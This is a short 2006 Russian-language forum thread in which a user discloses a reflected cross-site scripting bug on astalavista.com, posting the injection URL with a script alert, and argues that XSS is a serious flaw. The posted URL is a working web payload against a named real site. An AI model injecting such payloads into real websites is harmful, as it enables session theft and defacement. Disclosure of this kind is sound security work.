Баг на astalavista.com

Discussion in 'Мировые новости. Обсуждения.' started by drmist, 5 Mar 2006.

  1. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    Вот так он выглядит:
    http://astalavista.com/index.php/"><script>alert("Hacked by www.security-teams.net group");</script>

    Если кто-то думает, что XSS это не существенный баг, которым ничего никому нельзя сделать, а потому следует закрыть на него глаза - читаем мою старенькою статейку:
    http://www.security-teams.net/index.php?showtopic=2492
     
    #1 drmist, 5 Mar 2006
    Last edited: 5 Mar 2006
  2. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    Да, надеюсь будет считаться, что я читаю правила и соблюдаю копирайты, а не занимаюсь рекламой :-/